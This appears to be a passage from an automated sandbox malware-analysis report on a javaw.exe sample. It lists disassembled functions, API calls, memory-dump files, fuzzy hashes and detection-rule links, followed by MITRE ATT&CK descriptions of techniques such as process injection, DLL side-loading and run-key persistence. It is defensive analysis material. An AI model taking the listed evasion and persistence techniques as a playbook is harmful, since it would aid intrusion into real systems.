Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: LocalTimejio_snprintf
String ID: %d-%02d-%02d %02d:%02d:%02d
API String ID: 158129335-429551376
Opcode ID: ac1c5572526de0633f9d317e2f57eb82a0c2afcab30b17b8fc4b93a1ffafda85
Instruction ID: d985696685bff2f4ddde7199f61b96a6fbb50117d29ca88bc6d24e5cf6dca436
Opcode Fuzzy Hash: ac1c5572526de0633f9d317e2f57eb82a0c2afcab30b17b8fc4b93a1ffafda85
Instruction Fuzzy Hash: F2F01D6190012CBA8F14DFD989029BFB3FDEF0C611B00419AFD45A6141E779AE50D7B5

Function 00E1B177 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,00E352B8,00E1E743,00E352B8,0000001C,00E19379,?,00000000), ref: 00E1B1B7

Strings

C, xrefs: 00E1B19C
InitializeCriticalSectionEx, xrefs: 00E1B187

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: C$InitializeCriticalSectionEx
API String ID: 2593887523-407633496
Opcode ID: 19cf00f00f520662da8c1dfe3bc36a6ecd628ee6103f7ad4978bd8c9ca509a61
Instruction ID: a6f77374b4ac191b8bb97b21f2a9c16923a2f3d9ff41bf3e10e0bd50873872f7
Opcode Fuzzy Hash: 19cf00f00f520662da8c1dfe3bc36a6ecd628ee6103f7ad4978bd8c9ca509a61
Instruction Fuzzy Hash: 71E09231281228BBCF251F42DC2AEDD7F21EF00B60F015020FD18791A1C7724861DB91

Function 00E05CA2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,A Java Exception has occurred.,Java Virtual Machine Launcher,00000010), ref: 00E05CB9

Strings

A Java Exception has occurred., xrefs: 00E05CB2
Java Virtual Machine Launcher, xrefs: 00E05CAD

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Message
String ID: A Java Exception has occurred.$Java Virtual Machine Launcher
API String ID: 2030045667-3647220046
Opcode ID: d4aca85debfdfe75a9e970b63e5a6b6eef1d5464fed4aa1816c2622e41ff4061
Instruction ID: 3eb6a16bed867f59ecbcd90d8802698283720285608692391a8c813fa70b0e18
Opcode Fuzzy Hash: d4aca85debfdfe75a9e970b63e5a6b6eef1d5464fed4aa1816c2622e41ff4061
Instruction Fuzzy Hash: 0AD01230644340BFEF14D725DD4DF197FA0AB46B05F085094F249FA1E2CAA16845DF0A

Function 6D540020 Relevance: 5.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000), ref: 6D540042
TlsGetValue.KERNEL32(?,?), ref: 6D540094
TlsGetValue.KERNEL32(?,00000000), ref: 6D5400E5

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 543146bdd3314e56ce7d2d2d1d817930ac21364ecf7408aaaffcfda9901553d1
Instruction ID: 1ed45a44f03a31217d5a15a9b8497f1b2d6fcfad7d54e8fcb510623c15d02315
Opcode Fuzzy Hash: 543146bdd3314e56ce7d2d2d1d817930ac21364ecf7408aaaffcfda9901553d1
Instruction Fuzzy Hash: 6F518D30904205EFDB09CFA9D880FADBBF4BF19304F15846AE919AB351DB32A941CF91

Function 6FA424B3 Relevance: 5.2, APIs: 4, Instructions: 151COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,6FA4135D,?,?,?), ref: 6FA4251E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6FA4253E

Part of subcall function 6FA51FB6: labs.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000000,?,6FA42584,?,00000001), ref: 6FA51FBE

Part of subcall function 6FA52328: memset.VCRUNTIME140(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FA52368

memset.VCRUNTIME140(00000000,00000000,?), ref: 6FA425FF
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,6FA4135D,?,?,?,00000000), ref: 6FA42633

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: memset$freelabsmallocmemcpy
String ID:
API String ID: 3460279506-0
Opcode ID: 8733409080b57df87ba58af3c03c8c6c80b490a718af6c6bf0f0f5c7463e1ca4
Instruction ID: b74ef6d4afdb7206dd0a4de6b2831f722888b2925d9f670614b9182d152525f6
Opcode Fuzzy Hash: 8733409080b57df87ba58af3c03c8c6c80b490a718af6c6bf0f0f5c7463e1ca4
Instruction Fuzzy Hash: C341B3738097156BC712CEA0C940EAFB7ECEE85624F050A2BFD45D7140E739D99987E2

Function 6FAAF851 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6FAAF863
strlen.MSVCRT ref: 6FAAF870
strlen.MSVCRT ref: 6FAAF883
strlen.MSVCRT ref: 6FAAF8A0

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 511d34c1372c2dbcac96b30f3347b04f57c273d05e12a50dbc919310e5612524
Instruction ID: a95e7fa6a7d920b0ce480e66ab8da27926a04e22596841b0d941653dcb9f2723
Opcode Fuzzy Hash: 511d34c1372c2dbcac96b30f3347b04f57c273d05e12a50dbc919310e5612524
Instruction Fuzzy Hash: D521A174A003199FCB10EF79C8C09AE77E5EF49354F05857AE8988B344DB39E882CB91

Function 6FB24350 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,6FB24471,?,?,?,?,?,?,00000000,6FB22734), ref: 6FB24377
InitializeCriticalSection.KERNEL32(?,?,?,?,6FB24471,?,?,?,?,?,?,00000000,6FB22734), ref: 6FB243B4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,6FB24471,?,?,?,?,?,?,00000000,6FB22734), ref: 6FB243C0
EnterCriticalSection.KERNEL32(?,?,?,?,6FB24471,?,?,?,?,?,?,00000000,6FB22734), ref: 6FB243E8

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 4d19373433e330f65989fd46bdd5d3e153d874b356c8f6065da6ca5a97d41097
Instruction ID: 3405022ac80410db9d0c1f5460562601c8e26a24fc2b0c7a2cb401ec72c37ff7
Opcode Fuzzy Hash: 4d19373433e330f65989fd46bdd5d3e153d874b356c8f6065da6ca5a97d41097
Instruction Fuzzy Hash: A1118EB2544640CBEB10BB2DB1C12EE36E4FB86350F410826C446C7605E631F8A9CA93

Function 6FB1DAD0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6FB1DADE
TlsGetValue.KERNEL32 ref: 6FB1DB05
GetLastError.KERNEL32 ref: 6FB1DB0C
LeaveCriticalSection.KERNEL32 ref: 6FB1DB2C

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 0291a7c0d8637eb4b86ce123cfbf384ab3b8471e0ae229c98bb5c6bbfbd63f1a
Instruction ID: 745e8af21a454fc735192aeb40c5bdb4f1ef1f5c23d8e2ea08805712cdc4e084
Opcode Fuzzy Hash: 0291a7c0d8637eb4b86ce123cfbf384ab3b8471e0ae229c98bb5c6bbfbd63f1a
Instruction Fuzzy Hash: 49F08CB6A047568FCB10BF69B5C950F7BB4FA593A0B060539DD454B209E630B81ECBA3

Analysis Process: javaw.exePID: 3580, Parent PID: 7844COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	0%
Total number of Nodes:	691
Total number of Limit Nodes:	114

Executed Functions

Function 6FAA8ABF Relevance: 9.5, APIs: 4, Strings: 2, Instructions: 452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcmp.MSVCRT ref: 6FAA8C12
memcmp.MSVCRT ref: 6FAA8C5D
memcmp.MSVCRT ref: 6FAA8CCF
memcmp.MSVCRT ref: 6FAA8EFA

Strings

0, xrefs: 6FAA8EE3
SQLite format 3, xrefs: 6FAA8C52

Memory Dump Source

Source File: 00000013.00000002.3225138186.000000006FA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6FA50000, based on PE: true

Associated: 00000013.00000002.3225101922.000000006FA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225238401.000000006FB14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225308737.000000006FB2D000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225339282.000000006FB2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225375964.000000006FB2F000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000013.00000002.3225417010.000000006FB32000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fa50000_javaw.jbxd

Similarity

API ID: memcmp
String ID: 0$SQLite format 3
API String ID: 1475443563-3388949527
Opcode ID: 27215cb3932ea021193eed488169ad1e2bd644764c6d0ba0de061a2a06b0e506
Instruction ID: 8a6f965efdd74414e2ec27d998a150af16433b185884c6bf60d0bcf6c48e08c5
Opcode Fuzzy Hash: 27215cb3932ea021193eed488169ad1e2bd644764c6d0ba0de061a2a06b0e506
Instruction Fuzzy Hash: 22127C70A08385CFDB10CF28C58478DBBF2AF48354F198569E8459B396E77AE8C9CB50

Function 02F0D8F7 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

@\Ym, xrefs: 02F0DAC5

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID: @\Ym
API String ID: 0-2274142989
Opcode ID: ed4f98c6f263d9654f2142c334c333b4d52949448b930827217a020f5a65ff41
Instruction ID: 918b76e3cfd86d0e156b43c123b5479636b3579d7083ea5306929eaffa6f941c
Opcode Fuzzy Hash: ed4f98c6f263d9654f2142c334c333b4d52949448b930827217a020f5a65ff41
Instruction Fuzzy Hash: 28A1ACB1A04601DFDB18CFA4C9D4BAAFBB1FF49358F04819DDA1A4B382C734A840DB91

Function 02F0D8E0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

@\Ym, xrefs: 02F0DAC5

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID: @\Ym
API String ID: 0-2274142989
Opcode ID: 8719d62da3d7cb955dad05e0f7ea6cda593c8774b8fa56e5a811a1a545e345f1
Instruction ID: 3365e021f982d2d8dd76cc279f12af0c969113f9fdbaf9f4415f3e8ee7879bbf
Opcode Fuzzy Hash: 8719d62da3d7cb955dad05e0f7ea6cda593c8774b8fa56e5a811a1a545e345f1
Instruction Fuzzy Hash: 4161BCB1A04601DFDB18CF54C9D4BAAF7B1FF48758F04819CEA1A4B381C774A881DB91

Function 02F1492C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d52940ed3c843c4f2c434e859a3cd6b29c35aa91e876acb89a994ec5d0b868f
Instruction ID: eb03936db9d0f66a9eb9ea497ac1b2ed5e7c0e4e9ebc19fcb542ea3506f8ec53
Opcode Fuzzy Hash: 1d52940ed3c843c4f2c434e859a3cd6b29c35aa91e876acb89a994ec5d0b868f
Instruction Fuzzy Hash: 4631B575A083458FD721CF64C480B5AFBB1FF89304F598199D6589B396C335BC16CBA2

Function 02F14CCD Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958ff23a2f0c7b76de945c347e97cff3dc12b9dae067d720e8d11c99a1061a97
Instruction ID: afba586b8dcac42efa7250cf0adee22d1ba05307c1fbb4923c5a7aaf9de46130
Opcode Fuzzy Hash: 958ff23a2f0c7b76de945c347e97cff3dc12b9dae067d720e8d11c99a1061a97
Instruction Fuzzy Hash: F2F0DFB5900A06EBEB15CF65C004BEAFBB4FB88714F04460AD52C97350D77878298BD0

Function 02F14B78 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01aed32ef2af6c7a2c58bd20b6c40e67dcc1d3ef6ae565379c00f8949fd144c0
Instruction ID: abe5f25935164099033e306d6d5647af9895ed6dee71d01f1f780b302289f114
Opcode Fuzzy Hash: 01aed32ef2af6c7a2c58bd20b6c40e67dcc1d3ef6ae565379c00f8949fd144c0
Instruction Fuzzy Hash: 0BF07FB5904A06EBDB15CF61C0447DAFBB4BB88714F15421AD52C57350C77974658BC0

Function 02F0DA35 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d832b48ef8d156c5ee9ef6eb9cdedd1b9b2e5bbe3db02459b6ef1a78e92769a
Instruction ID: d9e8676486cf781080589630aa29c04d2ebe8b6d02bdfe36669ccf66e1925be8
Opcode Fuzzy Hash: 6d832b48ef8d156c5ee9ef6eb9cdedd1b9b2e5bbe3db02459b6ef1a78e92769a
Instruction Fuzzy Hash: 9DF0CAB6D00A06ABDB24CFA1C044BCAFBB4BB88718F15461AC62C67360D778B465CFC0

Function 02F149AA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b9db0a69e7c2adafc3afe3178facc7912831385c4a69c72a35730605992f4c
Instruction ID: eab209c0f0766d4868c57c178c44b7d5310b28740627f90b484b96297458191a
Opcode Fuzzy Hash: 86b9db0a69e7c2adafc3afe3178facc7912831385c4a69c72a35730605992f4c
Instruction Fuzzy Hash: 9AF0C2B6D00A0AABDB25CF61C0447DAFBB4BB84714F15421AC52C67350D7787465CFC0

Function 02F0DE6E Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011a24819e1788bd30414b84bcfca47c69a3440d9aa1a20d59fbef161983a725
Instruction ID: 711d537d745362522656ba60fc95aee5252ceacc48958de3372bce2f73c14b88
Opcode Fuzzy Hash: 011a24819e1788bd30414b84bcfca47c69a3440d9aa1a20d59fbef161983a725
Instruction Fuzzy Hash: 4AF0CAB6D00A06ABDB24CF61C0047CAFBB4BB88724F15421AC62C67360C779B465CFC0

Function 02F13C76 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6bc3c9d954e2c91330a357d945c5e30682ed47cadce7cfc6e42abe4564c4b0
Instruction ID: f2800796b3177f69455c85f8c7b8cf93a73721e7e4d9f9346e1ccd1c4c361a64
Opcode Fuzzy Hash: 2e6bc3c9d954e2c91330a357d945c5e30682ed47cadce7cfc6e42abe4564c4b0
Instruction Fuzzy Hash: E2F0CAB6D00A06ABDB24CFA1C044BCAFBB5BB88714F15421AC62C67360D778B865CFC0

Function 02F145E9 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3219405967.0000000002F02000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f02000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0b992d901c1469a2fd1b2b3b1e65bfa8d80e40ddc9513364fea655bb52223a
Instruction ID: fba44f1775e99fda8076f3f7e05666232d08226712f8583df0de183b402deb0b
Opcode Fuzzy Hash: 6f0b992d901c1469a2fd1b2b3b1e65bfa8d80e40ddc9513364fea655bb52223a
Instruction Fuzzy Hash: 63F0AEB6D00A0AEBDB24CF61C04478AFBB4BB44714F15421AC62C67260D77874658BC0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
